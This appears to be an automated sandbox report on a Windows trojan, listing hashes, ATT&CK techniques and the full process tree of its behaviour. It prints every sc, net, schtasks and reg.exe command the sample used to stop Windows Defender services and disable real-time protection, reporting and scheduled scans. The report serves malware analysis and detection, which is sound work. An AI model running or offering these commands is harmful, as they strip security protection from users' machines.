15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693

General

Target

15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
Size

269KB
MD5

6161cfa4c704ec1eff18ec8af42c72c7
SHA1

00bb164985ae6bfab56db839433618d505be5076
SHA256

15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693
SHA512

8e4bef47649706800034e1275d5882124c8342b0a0fb418c2f5e8ef14a103e8a321a76dde8772eff5da1f2b27cae072f45ac88f79f4ec655cc3670c7b7c1b46f

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Runs net.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.execmd.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1960 wrote to memory of 1652	1960	15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe	cmd.exe
PID 1960 wrote to memory of 1652	1960	15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe	cmd.exe
PID 1960 wrote to memory of 1652	1960	15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe	cmd.exe
PID 1960 wrote to memory of 1652	1960	15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe	cmd.exe
PID 1652 wrote to memory of 1224	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1224	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1224	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1488	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 1488	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 1488	1652	cmd.exe	net.exe
PID 1488 wrote to memory of 1536	1488	net.exe	net1.exe
PID 1488 wrote to memory of 1536	1488	net.exe	net1.exe
PID 1488 wrote to memory of 1536	1488	net.exe	net1.exe
PID 1652 wrote to memory of 1572	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1572	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1572	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1524	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 1524	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 1524	1652	cmd.exe	net.exe
PID 1524 wrote to memory of 964	1524	net.exe	net1.exe
PID 1524 wrote to memory of 964	1524	net.exe	net1.exe
PID 1524 wrote to memory of 964	1524	net.exe	net1.exe
PID 1652 wrote to memory of 1320	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1320	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1320	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 240	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 240	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 240	1652	cmd.exe	net.exe
PID 240 wrote to memory of 1044	240	net.exe	net1.exe
PID 240 wrote to memory of 1044	240	net.exe	net1.exe
PID 240 wrote to memory of 1044	240	net.exe	net1.exe
PID 1652 wrote to memory of 300	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 300	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 300	1652	cmd.exe	sc.exe
PID 1652 wrote to memory of 1816	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 1816	1652	cmd.exe	net.exe
PID 1652 wrote to memory of 1816	1652	cmd.exe	net.exe
PID 1816 wrote to memory of 1928	1816	net.exe	net1.exe
PID 1816 wrote to memory of 1928	1816	net.exe	net1.exe
PID 1816 wrote to memory of 1928	1816	net.exe	net1.exe
PID 1652 wrote to memory of 1700	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1700	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1700	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1204	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1204	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1204	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1060	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1060	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1060	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1656	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1656	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1656	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1324	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1324	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1324	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 112	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 112	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 112	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1776	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1776	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1776	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1692	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1692	1652	cmd.exe	reg.exe
PID 1652 wrote to memory of 1692	1652	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
"C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\257C.tmp\257D.tmp\257E.bat C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\system32\sc.exe
sc config Sense start= disabled
3⤵
PID:1224

C:\Windows\system32\net.exe
net stop Sense
3⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sense
4⤵
PID:1536

C:\Windows\system32\sc.exe
sc config WdFilter start= disabled
3⤵
PID:1572

C:\Windows\system32\net.exe
net stop WdFilter
3⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WdFilter
4⤵
PID:964

C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
3⤵
PID:1320

C:\Windows\system32\net.exe
net stop WdNisSvc Track
3⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WdNisSvc Track
4⤵
PID:1044

C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
3⤵
PID:300

C:\Windows\system32\net.exe
net stop WinDefend
3⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:1928

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
3⤵
PID:1700

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
3⤵
PID:1204

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
3⤵
PID:1060

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
3⤵
PID:1656

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:1324

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:112

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
3⤵
PID:1776

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableAntiSpywareRealtimeProtection" /t REG_DWORD /d "1" /f
3⤵
PID:1692

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:1296

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DpaDisabled" /t REG_DWORD /d "1" /f
3⤵
PID:732

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:1344

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
3⤵
PID:1304

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
3⤵
PID:284

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
3⤵
PID:1384

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
3⤵
PID:1188

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
3⤵
PID:816

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ProductStatus" /t REG_DWORD /d "0" /f
3⤵
PID:1068

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ManagedDefenderProductType" /t REG_DWORD /d "0" /f
3⤵
PID:2008

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:1464

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:1820

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
3⤵
PID:996

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "OneTimeSqmDataSent" /t REG_DWORD /d "0" /f
3⤵
PID:1100

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "AutomaticallyCleanAfterScan" /t REG_DWORD /d "0" /f
3⤵
PID:1648

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t REG_DWORD /d "8" /f
3⤵
PID:1452

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "AllowNonAdminFunctionality" /t REG_DWORD /d "0" /f
3⤵
PID:1764

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t REG_DWORD /d "1" /f
3⤵
PID:1456

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:292

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
3⤵
PID:1992

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:308

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Disabling Security Tools

1

T1089

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\257C.tmp\257D.tmp\257E.bat
Filesize
3KB

MD5
810407dc9da6b1688b552d84e3ff11bf

SHA1
27166f30e433b396ad96f7bc5cadb95afde66e16

SHA256
3cc739dcee739bbff3e609074d488fe108c58dcba7416a4a1941b79bf9d96aa2

SHA512
f1d45b73cb7f2145ea50a9aa6aa0f3326d60ffb5d6f7d37b7cfb93864af379e81e5a977aa5c3080313837769eb6223b8efadb84a8d4f99517bf3fbf6e245fdaf

Download Submit
memory/112-74-0x0000000000000000-mapping.dmp

Download
memory/240-64-0x0000000000000000-mapping.dmp

Download
memory/284-81-0x0000000000000000-mapping.dmp

Download
memory/292-95-0x0000000000000000-mapping.dmp

Download
memory/300-66-0x0000000000000000-mapping.dmp

Download
memory/308-97-0x0000000000000000-mapping.dmp

Download
memory/732-78-0x0000000000000000-mapping.dmp

Download
memory/816-84-0x0000000000000000-mapping.dmp

Download
memory/964-62-0x0000000000000000-mapping.dmp

Download
memory/996-89-0x0000000000000000-mapping.dmp

Download
memory/1044-65-0x0000000000000000-mapping.dmp

Download
memory/1060-71-0x0000000000000000-mapping.dmp

Download
memory/1068-85-0x0000000000000000-mapping.dmp

Download
memory/1100-90-0x0000000000000000-mapping.dmp

Download
memory/1188-83-0x0000000000000000-mapping.dmp

Download
memory/1204-70-0x0000000000000000-mapping.dmp

Download
memory/1224-57-0x0000000000000000-mapping.dmp

Download
memory/1296-77-0x0000000000000000-mapping.dmp

Download
memory/1304-80-0x0000000000000000-mapping.dmp

Download
memory/1320-63-0x0000000000000000-mapping.dmp

Download
memory/1324-73-0x0000000000000000-mapping.dmp

Download
memory/1344-79-0x0000000000000000-mapping.dmp

Download
memory/1384-82-0x0000000000000000-mapping.dmp

Download
memory/1452-92-0x0000000000000000-mapping.dmp

Download
memory/1456-94-0x0000000000000000-mapping.dmp

Download
memory/1464-87-0x0000000000000000-mapping.dmp

Download
memory/1488-58-0x0000000000000000-mapping.dmp

Download
memory/1524-61-0x0000000000000000-mapping.dmp

Download
memory/1536-59-0x0000000000000000-mapping.dmp

Download
memory/1572-60-0x0000000000000000-mapping.dmp

Download
memory/1648-91-0x0000000000000000-mapping.dmp

Download
memory/1652-55-0x0000000000000000-mapping.dmp

Download
memory/1656-72-0x0000000000000000-mapping.dmp

Download
memory/1692-76-0x0000000000000000-mapping.dmp

Download
memory/1700-69-0x0000000000000000-mapping.dmp

Download
memory/1764-93-0x0000000000000000-mapping.dmp

Download
memory/1776-75-0x0000000000000000-mapping.dmp

Download
memory/1816-67-0x0000000000000000-mapping.dmp

Download
memory/1820-88-0x0000000000000000-mapping.dmp

Download
memory/1928-68-0x0000000000000000-mapping.dmp

Download
memory/1960-54-0x00000000759F1000-0x00000000759F3000-memory.dmp

Filesize
8KB

Download
memory/1992-96-0x0000000000000000-mapping.dmp

Download
memory/2008-86-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing